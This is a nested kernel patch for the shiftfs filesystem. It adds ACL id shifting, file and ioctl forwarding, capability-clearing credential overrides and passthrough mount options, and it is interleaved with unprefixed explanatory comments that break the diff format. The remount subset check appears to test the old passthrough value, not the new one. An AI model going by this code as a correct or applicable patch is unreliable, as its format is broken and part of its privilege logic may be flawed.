-+shift_acl_ids(struct user_namespace *from, struct user_namespace *to,
-+	      struct posix_acl *acl)
- {
--	struct inode *inode;
--
--	inode = new_inode(sb);
--	if (!inode)
--		return NULL;
--
--	/*
--	 * our inode is completely vestigial.  All lookups, getattr
--	 * and permission checks are done on the underlying inode, so
--	 * what the user sees is entirely from the underlying inode.
--	 */
--	mode &= S_IFMT;
-+	int i;
-+
-+	for (i = 0; i < acl->a_count; i++) {
-+		struct posix_acl_entry *e = &acl->a_entries[i];
-+		switch(e->e_tag) {
-+		case ACL_USER:
-+			e->e_uid = shift_kuid(from, to, e->e_uid);
-+			if (!uid_valid(e->e_uid))
-+				return -EOVERFLOW;
-+			break;
-+		case ACL_GROUP:
-+			e->e_gid = shift_kgid(from, to, e->e_gid);
-+			if (!gid_valid(e->e_gid))
-+				return -EOVERFLOW;
-+			break;
-+		}
-+	}
-+	return 0;
-+}
- 
--	inode->i_ino = get_next_ino();
--	inode->i_mode = mode;
--	inode->i_flags |= S_NOATIME | S_NOCMTIME;
-+static void
-+shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
-+		    void *value, size_t size)
-+{
-+	struct posix_acl_xattr_header *header = value;
-+	struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end;
-+	int count;
-+	kuid_t kuid;
-+	kgid_t kgid;
- 
--	inode->i_op = &shiftfs_inode_ops;
-+	if (!value)
-+		return;
-+	if (size < sizeof(struct posix_acl_xattr_header))
-+		return;
-+	if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION))
-+		return;
- 
--	shiftfs_fill_inode(inode, dentry);
-+	count = posix_acl_xattr_count(size);
-+	if (count < 0)
-+		return;
-+	if (count == 0)
-+		return;
- 
--	return inode;
-+	for (end = entry + count; entry != end; entry++) {
-+		switch(le16_to_cpu(entry->e_tag)) {
-+		case ACL_USER:
-+			kuid = make_kuid(&init_user_ns, le32_to_cpu(entry->e_id));
-+			kuid = shift_kuid(from, to, kuid);
-+			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
-+			break;
-+		case ACL_GROUP:
-+			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
-+			kgid = shift_kgid(from, to, kgid);
-+			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
-+			break;
-+		default:
-+			break;
-+		}
-+	}
- }
- 
--static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
-+static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
- {
--	struct super_block *sb = dentry->d_sb;
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct inode *loweri = inode->i_private;
-+	const struct cred *oldcred;
-+	struct posix_acl *lower_acl, *acl = NULL;
-+	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
-+	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
-+	int size;
-+	int err;
- 
--	if (ssi->mark)
--		seq_show_option(m, "mark", NULL);
-+	if (!IS_POSIXACL(loweri))
-+		return NULL;
- 
--	return 0;
--}
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	lower_acl = get_acl(loweri, type);
-+	revert_creds(oldcred);
- 
--static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
--{
--	struct super_block *sb = dentry->d_sb;
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
--	struct dentry *root = sb->s_root;
--	struct dentry *realroot = root->d_fsdata;
--	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
--	int err;
-+	if (lower_acl && !IS_ERR(lower_acl)) {
-+		/* XXX: export posix_acl_clone? */
-+		size = sizeof(struct posix_acl) +
-+		       lower_acl->a_count * sizeof(struct posix_acl_entry);
-+		acl = kmemdup(lower_acl, size, GFP_KERNEL);
-+		posix_acl_release(lower_acl);
- 
--	err = vfs_statfs(&realpath, buf);
--	if (err)
--		return err;
-+		if (!acl)
-+			return ERR_PTR(-ENOMEM);
- 
--	buf->f_type = sb->s_magic;
-+		refcount_set(&acl->a_refcount, 1);
- 
--	return 0;
-+		err = shift_acl_ids(from_ns, to_ns, acl);
-+		if (err) {
-+			kfree(acl);
-+			return ERR_PTR(err);
-+		}
-+	}
-+
-+	return acl;
- }
- 
--static void shiftfs_put_super(struct super_block *sb)
-+static int
-+shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
-+			   struct dentry *dentry, struct inode *inode,
-+			   const char *name, void *buffer, size_t size)
- {
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct inode *loweri = inode->i_private;
-+	int ret;
-+
-+	ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name,
-+				buffer, size);
-+	if (ret < 0)
-+		return ret;
- 
--	mntput(ssi->mnt);
--	put_user_ns(ssi->userns);
--	kfree(ssi);
-+	inode_lock(loweri);
-+	shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns,
-+			    buffer, size);
-+	inode_unlock(loweri);
-+	return ret;
- }
- 
--static const struct xattr_handler shiftfs_xattr_handler = {
--	.prefix = "",
--	.get    = shiftfs_xattr_get,
--	.set    = shiftfs_xattr_set,
--};
-+static int
-+shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
-+			    struct dentry *dentry, struct inode *inode,
-+			    const char *name, const void *value,
-+			    size_t size, int flags)
-+{
-+	struct inode *loweri = inode->i_private;
-+	int err;
- 
--const struct xattr_handler *shiftfs_xattr_handlers[] = {
--	&shiftfs_xattr_handler,
--	NULL
--};
-+	if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl)
-+		return -EOPNOTSUPP;
-+	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
-+		return value ? -EACCES : 0;
-+	if (!inode_owner_or_capable(inode))
-+		return -EPERM;
-+
-+	if (value) {
-+		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
-+				    loweri->i_sb->s_user_ns,
-+				    (void *)value, size);
-+		err = shiftfs_setxattr(dentry, inode, handler->name, value,
-+				       size, flags);
-+	} else {
-+		err = shiftfs_removexattr(dentry, handler->name);
-+	}
- 
--static const struct super_operations shiftfs_super_ops = {
--	.put_super	= shiftfs_put_super,
--	.show_options	= shiftfs_show_options,
--	.statfs		= shiftfs_statfs,
-+	if (!err)
-+		shiftfs_copyattr(loweri, inode);
-+
-+	return err;
-+}
-+
-+static const struct xattr_handler
-+shiftfs_posix_acl_access_xattr_handler = {
-+	.name = XATTR_NAME_POSIX_ACL_ACCESS,
-+	.flags = ACL_TYPE_ACCESS,
-+	.get = shiftfs_posix_acl_xattr_get,
-+	.set = shiftfs_posix_acl_xattr_set,
- };
- 
--struct shiftfs_data {
--	void *data;
--	const char *path;
-+static const struct xattr_handler
-+shiftfs_posix_acl_default_xattr_handler = {
-+	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
-+	.flags = ACL_TYPE_DEFAULT,
-+	.get = shiftfs_posix_acl_xattr_get,
-+	.set = shiftfs_posix_acl_xattr_set,
- };
- 
--static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
--			      int silent)
--{
--	struct shiftfs_data *data = raw_data;
--	char *name = kstrdup(data->path, GFP_KERNEL);
--	int err = -ENOMEM;
--	struct shiftfs_super_info *ssi = NULL;
--	struct path path;
--	struct dentry *dentry;
-+#else /* !CONFIG_SHIFT_FS_POSIX_ACL */
- 
--	if (!name)
--		goto out;
-+#define shiftfs_get_acl NULL
- 
--	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
--	if (!ssi)
--		goto out;
-+#endif /* CONFIG_SHIFT_FS_POSIX_ACL */
- 
--	err = -EPERM;
--	err = shiftfs_parse_options(ssi, data->data);
-+static const struct inode_operations shiftfs_dir_inode_operations = {
-+	.lookup		= shiftfs_lookup,
-+	.mkdir		= shiftfs_mkdir,
-+	.symlink	= shiftfs_symlink,
-+	.unlink		= shiftfs_unlink,
-+	.rmdir		= shiftfs_rmdir,
-+	.rename		= shiftfs_rename,
-+	.link		= shiftfs_link,
-+	.setattr	= shiftfs_setattr,
-+	.create		= shiftfs_create,
-+	.mknod		= shiftfs_mknod,
-+	.permission	= shiftfs_permission,
-+	.getattr	= shiftfs_getattr,
-+	.listxattr	= shiftfs_listxattr,
-+	.get_acl	= shiftfs_get_acl,
-+};
-+
-+static const struct inode_operations shiftfs_file_inode_operations = {
-+	.fiemap		= shiftfs_fiemap,
-+	.getattr	= shiftfs_getattr,
-+	.get_acl	= shiftfs_get_acl,
-+	.listxattr	= shiftfs_listxattr,
-+	.permission	= shiftfs_permission,
-+	.setattr	= shiftfs_setattr,
-+	.tmpfile	= shiftfs_tmpfile,
-+};
-+
-+static const struct inode_operations shiftfs_special_inode_operations = {
-+	.getattr	= shiftfs_getattr,
-+	.get_acl	= shiftfs_get_acl,
-+	.listxattr	= shiftfs_listxattr,
-+	.permission	= shiftfs_permission,
-+	.setattr	= shiftfs_setattr,
-+};
-+
-+static const struct inode_operations shiftfs_symlink_inode_operations = {
-+	.getattr	= shiftfs_getattr,
-+	.get_link	= shiftfs_get_link,
-+	.listxattr	= shiftfs_listxattr,
-+	.setattr	= shiftfs_setattr,
-+};
-+
-+static struct file *shiftfs_open_realfile(const struct file *file,
-+					  struct path *realpath)
-+{
-+	struct file *lowerf;
-+	const struct cred *oldcred;
-+	struct inode *inode = file_inode(file);
-+	struct inode *loweri = realpath->dentry->d_inode;
-+	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	/* XXX: open_with_fake_path() not guaranteed to stay around; if
-+	 * removed, use dentry_open() */
-+	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
-+	revert_creds(oldcred);
-+
-+	return lowerf;
-+}
-+
-+#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
-+
-+static int shiftfs_change_flags(struct file *file, unsigned int flags)
-+{
-+	struct inode *inode = file_inode(file);
-+	int err;
-+
-+	/* if some flag changed that cannot be changed then something's amiss */
-+	if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK))
-+		return -EIO;
-+
-+	flags &= SHIFTFS_SETFL_MASK;
-+
-+	if (((flags ^ file->f_flags) & O_APPEND) && IS_APPEND(inode))
-+		return -EPERM;
-+
-+	if (flags & O_DIRECT) {
-+		if (!file->f_mapping->a_ops ||
-+		    !file->f_mapping->a_ops->direct_IO)
-+			return -EINVAL;
-+	}
-+
-+	if (file->f_op->check_flags) {
-+		err = file->f_op->check_flags(flags);
-+		if (err)
-+			return err;
-+	}
-+
-+	spin_lock(&file->f_lock);
-+	file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags;
-+	spin_unlock(&file->f_lock);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+
-+	lowerfd->flags = 0;
-+	lowerfd->file = realfile;
-+
-+	/* Did the flags change since open? */
-+	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-+		return shiftfs_change_flags(lowerfd->file, file->f_flags);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_open(struct inode *inode, struct file *file)
-+{
-+	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
-+	struct shiftfs_file_info *file_info;
-+	struct file *realfile;
-+	struct path *realpath;
-+
-+	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
-+	if (!file_info)
-+		return -ENOMEM;
-+
-+	realpath = &file_info->realpath;
-+	realpath->mnt = ssi->mnt;
-+	realpath->dentry = file->f_path.dentry->d_fsdata;
-+
-+	realfile = shiftfs_open_realfile(file, realpath);
-+	if (IS_ERR(realfile)) {
-+		kmem_cache_free(shiftfs_file_info_cache, file_info);
-+		return PTR_ERR(realfile);
-+	}
-+
-+	file->private_data = file_info;
-+	file_info->realfile = realfile;
-+	return 0;
-+}
-+
-+static int shiftfs_release(struct inode *inode, struct file *file)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+
-+	if (file_info) {
-+		if (file_info->realfile)
-+			fput(file_info->realfile);
-+
-+		kmem_cache_free(shiftfs_file_info_cache, file_info);
-+	}
-+
-+	return 0;
-+}
-+
-+static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
-+{
-+	struct inode *realinode = file_inode(file)->i_private;
-+
-+	return generic_file_llseek_size(file, offset, whence,
-+					realinode->i_sb->s_maxbytes,
-+					i_size_read(realinode));
-+}
-+
-+/* XXX: Need to figure out what to do about atime updates, maybe other
-+ * timestamps too ... ref. ovl_file_accessed() */
-+
-+static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
-+{
-+	int ifl = iocb->ki_flags;
-+	rwf_t flags = 0;
-+
-+	if (ifl & IOCB_NOWAIT)
-+		flags |= RWF_NOWAIT;
-+	if (ifl & IOCB_HIPRI)
-+		flags |= RWF_HIPRI;
-+	if (ifl & IOCB_DSYNC)
-+		flags |= RWF_DSYNC;
-+	if (ifl & IOCB_SYNC)
-+		flags |= RWF_SYNC;
-+
-+	return flags;
-+}
-+
-+static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
-+{
-+	struct file *file = iocb->ki_filp;
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	ssize_t ret;
-+
-+	if (!iov_iter_count(iter))
-+		return 0;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos,
-+			    shiftfs_iocb_to_rwf(iocb));
-+	revert_creds(oldcred);
-+
-+	shiftfs_file_accessed(file);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter)
-+{
-+	struct file *file = iocb->ki_filp;
-+	struct inode *inode = file_inode(file);
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	ssize_t ret;
-+
-+	if (!iov_iter_count(iter))
-+		return 0;
-+
-+	inode_lock(inode);
-+	/* Update mode */
-+	shiftfs_copyattr(inode->i_private, inode);
-+	ret = file_remove_privs(file);
-+	if (ret)
-+		goto out_unlock;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		goto out_unlock;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	file_start_write(lowerfd.file);
-+	ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos,
-+			     shiftfs_iocb_to_rwf(iocb));
-+	file_end_write(lowerfd.file);
-+	revert_creds(oldcred);
-+
-+	/* Update size */
-+	shiftfs_copyattr(inode->i_private, inode);
-+
-+	fdput(lowerfd);
-+
-+out_unlock:
-+	inode_unlock(inode);
-+	return ret;
-+}
-+
-+static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
-+			 int datasync)
-+{
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_fsync_range(lowerfd.file, start, end, datasync);
-+	revert_creds(oldcred);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	if (!realfile->f_op->mmap)
-+		return -ENODEV;
-+
-+	if (WARN_ON(file != vma->vm_file))
-+		return -EIO;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	vma->vm_file = get_file(realfile);
-+	ret = call_mmap(vma->vm_file, vma);
-+	revert_creds(oldcred);
-+
-+	shiftfs_file_accessed(file);
-+
-+	if (ret)
-+		fput(realfile); /* Drop refcount from new vm_file value */
-+	else
-+		fput(file); /* Drop refcount from previous vm_file value */
-+
-+	return ret;
-+}
-+
-+static long shiftfs_fallocate(struct file *file, int mode, loff_t offset,
-+			      loff_t len)
-+{
-+	struct inode *inode = file_inode(file);
-+	struct inode *loweri = inode->i_private;
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_fallocate(lowerfd.file, mode, offset, len);
-+	revert_creds(oldcred);
-+
-+	/* Update size */
-+	shiftfs_copyattr(loweri, inode);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
-+			   int advice)
-+{
-+	struct fd lowerfd;
-+	const struct cred *oldcred;
-+	int ret;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	ret = vfs_fadvise(lowerfd.file, offset, len, advice);
-+	revert_creds(oldcred);
-+
-+	fdput(lowerfd);
-+	return ret;
-+}
-+
-+static int shiftfs_override_ioctl_creds(const struct super_block *sb,
-+					const struct cred **oldcred,
-+					struct cred **newcred)
-+{
-+	kuid_t fsuid = current_fsuid();
-+	kgid_t fsgid = current_fsgid();
-+
-+	*oldcred = shiftfs_override_creds(sb);
-+
-+	*newcred = prepare_creds();
-+	if (!*newcred) {
-+		revert_creds(*oldcred);
-+		return -ENOMEM;
-+	}
-+
-+	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
-+	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+
-+	/* clear all caps to prevent bypassing capable() checks */
-+	cap_clear((*newcred)->cap_bset);
-+	cap_clear((*newcred)->cap_effective);
-+	cap_clear((*newcred)->cap_inheritable);
-+	cap_clear((*newcred)->cap_permitted);
-+
-+	put_cred(override_creds(*newcred));
-+	return 0;
-+}
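For emphasis, the effect of the cap_clear() calls above, sketched as a comment (illustrative only; capable() is the standard kernel check):

	/*
	 * While the overridden ioctl credentials are in effect, any
	 * lower-filesystem check such as
	 *
	 *	if (capable(CAP_SYS_ADMIN))
	 *		take_privileged_path();
	 *
	 * evaluates false, so only inode-based permission checks can
	 * succeed.
	 */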
-+
-+static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
-+					      struct cred *newcred)
-+{
-+	return shiftfs_revert_object_creds(oldcred, newcred);
-+}
-+
-+static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
-+			       unsigned long arg)
-+{
-+	long ret = 0;
-+	struct fd lowerfd;
-+	struct cred *newcred;
-+	const struct cred *oldcred;
-+	struct super_block *sb = file->f_path.dentry->d_sb;
-+
-+	ret = shiftfs_real_fdget(file, &lowerfd);
-+	if (ret)
-+		return ret;
-+
-+	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
-+	if (ret)
-+		goto out_fdput;
-+
-+	ret = vfs_ioctl(lowerfd.file, cmd, arg);
-+
-+	shiftfs_revert_ioctl_creds(oldcred, newcred);
-+
-+	shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file));
-+	shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file));
-+
-+out_fdput:
-+	fdput(lowerfd);
-+
-+	return ret;
-+}
-+
-+static long shiftfs_ioctl(struct file *file, unsigned int cmd,
-+			  unsigned long arg)
-+{
-+	switch (cmd) {
-+	case FS_IOC_GETVERSION:
-+		/* fall through */
-+	case FS_IOC_GETFLAGS:
-+		/* fall through */
-+	case FS_IOC_SETFLAGS:
-+		break;
-+	default:
-+		return -ENOTTY;
-+	}
-+
-+	return shiftfs_real_ioctl(file, cmd, arg);
-+}
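From userspace the whitelist above looks like this (the file descriptor and helper are hypothetical; FS_IOC_GETFLAGS is the standard VFS ioctl):

	#include <sys/ioctl.h>
	#include <linux/fs.h>

	/* Whitelisted requests are forwarded to the lower filesystem;
	 * any other cmd gets -ENOTTY from shiftfs itself.
	 */
	long read_inode_flags(int fd)
	{
		long flags = 0;

		if (ioctl(fd, FS_IOC_GETFLAGS, &flags) < 0)
			return -1;
		return flags;
	}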
-+
-+static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
-+				 unsigned long arg)
-+{
-+	switch (cmd) {
-+	case FS_IOC32_GETVERSION:
-+		/* fall through */
-+	case FS_IOC32_GETFLAGS:
-+		/* fall through */
-+	case FS_IOC32_SETFLAGS:
-+		break;
-+	default:
-+		return -ENOIOCTLCMD;
-+	}
-+
-+	return shiftfs_real_ioctl(file, cmd, arg);
-+}
-+
-+enum shiftfs_copyop {
-+	SHIFTFS_COPY,
-+	SHIFTFS_CLONE,
-+	SHIFTFS_DEDUPE,
-+};
-+
-+static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
-+				struct file *file_out, loff_t pos_out, u64 len,
-+				unsigned int flags, enum shiftfs_copyop op)
-+{
-+	ssize_t ret;
-+	struct fd real_in, real_out;
-+	const struct cred *oldcred;
-+	struct inode *inode_out = file_inode(file_out);
-+	struct inode *loweri = inode_out->i_private;
-+
-+	ret = shiftfs_real_fdget(file_out, &real_out);
-+	if (ret)
-+		return ret;
-+
-+	ret = shiftfs_real_fdget(file_in, &real_in);
-+	if (ret) {
-+		fdput(real_out);
-+		return ret;
-+	}
-+
-+	oldcred = shiftfs_override_creds(inode_out->i_sb);
-+	switch (op) {
-+	case SHIFTFS_COPY:
-+		ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file,
-+					  pos_out, len, flags);
-+		break;
-+
-+	case SHIFTFS_CLONE:
-+		ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file,
-+					   pos_out, len, flags);
-+		break;
-+
-+	case SHIFTFS_DEDUPE:
-+		ret = vfs_dedupe_file_range_one(real_in.file, pos_in,
-+						real_out.file, pos_out, len,
-+						flags);
-+		break;
-+	}
-+	revert_creds(oldcred);
-+
-+	/* Update size */
-+	shiftfs_copyattr(loweri, inode_out);
-+
-+	fdput(real_in);
-+	fdput(real_out);
-+
-+	return ret;
-+}
-+
-+static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
-+				       struct file *file_out, loff_t pos_out,
-+				       size_t len, unsigned int flags)
-+{
-+	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags,
-+				SHIFTFS_COPY);
-+}
-+
-+static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in,
-+				       struct file *file_out, loff_t pos_out,
-+				       loff_t len, unsigned int remap_flags)
-+{
-+	enum shiftfs_copyop op;
-+
-+	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
-+		return -EINVAL;
-+
-+	if (remap_flags & REMAP_FILE_DEDUP)
-+		op = SHIFTFS_DEDUPE;
-+	else
-+		op = SHIFTFS_CLONE;
-+
-+	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len,
-+				remap_flags, op);
-+}
-+
-+static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
-+{
-+	const struct cred *oldcred;
-+	int err = -ENOTDIR;
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	err = iterate_dir(realfile, ctx);
-+	revert_creds(oldcred);
-+
-+	return err;
-+}
-+
-+const struct file_operations shiftfs_file_operations = {
-+	.open			= shiftfs_open,
-+	.release		= shiftfs_release,
-+	.llseek			= shiftfs_llseek,
-+	.read_iter		= shiftfs_read_iter,
-+	.write_iter		= shiftfs_write_iter,
-+	.fsync			= shiftfs_fsync,
-+	.mmap			= shiftfs_mmap,
-+	.fallocate		= shiftfs_fallocate,
-+	.fadvise		= shiftfs_fadvise,
-+	.unlocked_ioctl		= shiftfs_ioctl,
-+	.compat_ioctl		= shiftfs_compat_ioctl,
-+	.copy_file_range	= shiftfs_copy_file_range,
-+	.remap_file_range	= shiftfs_remap_file_range,
-+};
-+
-+const struct file_operations shiftfs_dir_operations = {
-+	.compat_ioctl		= shiftfs_compat_ioctl,
-+	.fsync			= shiftfs_fsync,
-+	.iterate_shared		= shiftfs_iterate_shared,
-+	.llseek			= shiftfs_llseek,
-+	.open			= shiftfs_open,
-+	.read			= generic_read_dir,
-+	.release		= shiftfs_release,
-+	.unlocked_ioctl		= shiftfs_ioctl,
-+};
-+
-+static const struct address_space_operations shiftfs_aops = {
-+	/* For O_DIRECT, dentry_open() checks f_mapping->a_ops->direct_IO */
-+	.direct_IO	= noop_direct_IO,
-+};
-+
-+static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
-+			       umode_t mode, dev_t dev, struct dentry *dentry)
-+{
-+	struct inode *loweri;
-+
-+	inode->i_ino = ino;
-+	inode->i_flags |= S_NOCMTIME;
-+
-+	mode &= S_IFMT;
-+	inode->i_mode = mode;
-+	switch (mode & S_IFMT) {
-+	case S_IFDIR:
-+		inode->i_op = &shiftfs_dir_inode_operations;
-+		inode->i_fop = &shiftfs_dir_operations;
-+		break;
-+	case S_IFLNK:
-+		inode->i_op = &shiftfs_symlink_inode_operations;
-+		break;
-+	case S_IFREG:
-+		inode->i_op = &shiftfs_file_inode_operations;
-+		inode->i_fop = &shiftfs_file_operations;
-+		inode->i_mapping->a_ops = &shiftfs_aops;
-+		break;
-+	default:
-+		inode->i_op = &shiftfs_special_inode_operations;
-+		init_special_inode(inode, mode, dev);
-+		break;
-+	}
-+
-+	if (!dentry)
-+		return;
-+
-+	loweri = dentry->d_inode;
-+	if (!loweri->i_op->get_link)
-+		inode->i_opflags |= IOP_NOFOLLOW;
-+
-+	shiftfs_copyattr(loweri, inode);
-+	shiftfs_copyflags(loweri, inode);
-+	set_nlink(inode, loweri->i_nlink);
-+}
-+
-+static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
-+
-+	if (sbinfo->mark)
-+		seq_show_option(m, "mark", NULL);
-+
-+	if (sbinfo->passthrough)
-+		seq_printf(m, ",passthrough=%u", sbinfo->passthrough);
-+
-+	return 0;
-+}
-+
-+static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
-+{
-+	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
-+	struct dentry *root = sb->s_root;
-+	struct dentry *realroot = root->d_fsdata;
-+	struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot };
-+	int err;
-+
-+	err = vfs_statfs(&realpath, buf);
- 	if (err)
--		goto out;
-+		return err;
- 
--	/* to mark a mount point, must be real root */
--	if (ssi->mark && !capable(CAP_SYS_ADMIN))
--		goto out;
-+	if (!shiftfs_passthrough_statfs(sbinfo))
-+		buf->f_type = sb->s_magic;
- 
--	/* else to mount a mark, must be userns admin */
--	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
--		goto out;
-+	return 0;
-+}
- 
--	err = kern_path(name, LOOKUP_FOLLOW, &path);
-+static void shiftfs_evict_inode(struct inode *inode)
-+{
-+	struct inode *loweri = inode->i_private;
-+
-+	clear_inode(inode);
-+
-+	if (loweri)
-+		iput(loweri);
-+}
-+
-+static void shiftfs_put_super(struct super_block *sb)
-+{
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
-+
-+	if (sbinfo) {
-+		mntput(sbinfo->mnt);
-+		put_cred(sbinfo->creator_cred);
-+		kfree(sbinfo);
-+	}
-+}
-+
-+static const struct xattr_handler shiftfs_xattr_handler = {
-+	.prefix = "",
-+	.get    = shiftfs_xattr_get,
-+	.set    = shiftfs_xattr_set,
-+};
-+
-+const struct xattr_handler *shiftfs_xattr_handlers[] = {
-+#ifdef CONFIG_SHIFT_FS_POSIX_ACL
-+	&shiftfs_posix_acl_access_xattr_handler,
-+	&shiftfs_posix_acl_default_xattr_handler,
-+#endif
-+	&shiftfs_xattr_handler,
-+	NULL
-+};
-+
-+static inline bool passthrough_is_subset(int old_flags, int new_flags)
-+{
-+	if ((new_flags & old_flags) != new_flags)
-+		return false;
-+
-+	return true;
-+}
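A quick worked example of the subset check above, using SHIFTFS_PASSTHROUGH_STAT = 1 and SHIFTFS_PASSTHROUGH_IOCTL = 2 (the latter is only introduced further below in this patch):

	/*
	 * passthrough_is_subset(3, 1) -> true   (1 & 3 == 1)
	 * passthrough_is_subset(1, 3) -> false  (3 & 1 == 1, != 3)
	 *
	 * i.e. a mount on top of a mark mount may drop passthrough bits
	 * but never add ones the mark mount did not grant.
	 */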
-+
-+static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
-+{
-+	int err;
-+	struct shiftfs_super_info new = {};
-+	struct shiftfs_super_info *info = sb->s_fs_info;
-+
-+	err = shiftfs_parse_mount_options(&new, data);
- 	if (err)
--		goto out;
-+		return err;
-+
-+	/* Mark mount option cannot be changed. */
-+	if (info->mark || (info->mark != new.mark))
-+		return -EPERM;
-+
-+	if (info->passthrough != new.passthrough) {
-+		/* Don't allow exceeding passthrough options of mark mount. */
-+		if (!passthrough_is_subset(info->info_mark->passthrough,
-+					   info->passthrough))
-+			return -EPERM;
-+
-+		info->passthrough = new.passthrough;
-+	}
-+
-+	return 0;
-+}
- 
--	err = -EPERM;
-+static const struct super_operations shiftfs_super_ops = {
-+	.put_super	= shiftfs_put_super,
-+	.show_options	= shiftfs_show_options,
